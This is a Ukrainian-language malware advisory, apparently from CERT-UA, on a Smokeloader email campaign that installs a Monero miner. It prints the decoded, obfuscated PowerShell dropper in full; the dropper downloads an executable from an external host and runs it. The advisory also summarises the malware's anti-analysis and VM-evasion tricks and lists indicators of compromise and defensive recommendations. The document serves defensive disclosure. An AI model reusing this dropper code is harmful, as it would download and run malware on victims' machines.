Виявлено факт поширення шкідливого програмного забезпечення Smokeloader, який скачував на комп’ютери жертв програму для майнингу криптовалюти Monero.
Поширення Smokeloader відбувається через розсилку поштових повідомлень зі злоякісним Javascript-ом.
В самому Javascript шкідливий код зашифрований в виді Base64 і при розшифруванні виглядає так:
cmd /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3%
$http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObjectADODB.Stream; $path = $env:temp + ‘\1964.exe’; $http_request.open(‘GET’, ‘http://enterwords.ru/uadoc/crsse.exe’, $false);
$http_request.send();if($http_request.Status -eq”200″) {$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);
$adodb.position = 0;$adodb.savetofile($path); $adodb.close();}else{ Write-Host $http_request.statusText; }Start-Process $path;
Він скачує з сайту hXXp://enterwords.ru/uadoc/crsse.exe файл crsse.exe і зберігає його в директорії C:\tmp\1964.exe. Така назва файлу вибрана навмисно, щоб користувач міг сплутати її з процесом csrss.exe (Client/Server Runtime Subsystem).
Crsse.exe це шкідливе програмне забезпечення забезпечення типу Smokeloader. Для унеможливлення його аналізу він має техніки приховування і анти-аналізу. В crsse.exe є безліч непотрібних функцій, які заважають аналізу. Серед них в crsse.exe виділяється пам’ять і записується туди тіло вірусу, куди переходить виконання, проте без заголовка, щоб не можна було його динамічно проаналізувати.
Перехід виконання в іншу область пам’яті:
Далі Smokeloader запускає потік, який перевіряє на наявність запущених програм, які використовуються для аналізу шкідливого коду. Якщо вони присутні, він закриває їх. Також, в регістрі (System\\CurrentControlSet\\Services\\ Disk\\Enum) перевіряє чи дана система запущена в віртуальному середовищі і якщо так, то програма переходить до безкінечного циклу сну.
Після цього запускається та інфікується, шкідливим кодом, процес explorer.exe. Він скачує з hXXp://parodadoca.ru/panel/mr/curl.exe файл curl.exe, який є програмою для майнингу криптовалюти Monero. Файл зберігається в директорії: C:\Users\Ім’яКористувача\AppData\Roaming\MicroMon\curl.exe.
Перелік індикаторів компрометації:
MD5 / Назви файлів:
b7a59f6868623e0a95eb58a0d09f4810 curl.exe
d7c21ada5b5325e52295a331c6fb53a4 Заявка.js
2c575c6037d4aa5f74a239d6ebf4d381 crsse.exe
Шкідливі файли, які створюються:
C:\Users\Ім’я Користувача\AppData\Roaming\MicroMon\curl.exe
C:\tmp\1964.exe
Шкідливі посилання (Malicious Links):
hXXp://parodadoca.ru/panel/mr/curl.exe
hXXp://enterwords.ru/uadoc/crsse.exe
Корисні посилання:
Рекомендації CERT—UA:
-
Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
-
Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.
-
Перевірити наявність отриманих повідомлень клієнтів поштового серверу, для визначення потенційно вражених користувачів.
-
Перевірити наявність переходів за посиланнями, які містили шкідливі файли, для визначення потенційно вражених користувачів.
-
Провести заходи з виявлення та видалення ШПЗ.
-
Оновити антивірусну базу та просканувати потенційно заражені системи.
Автор публікації
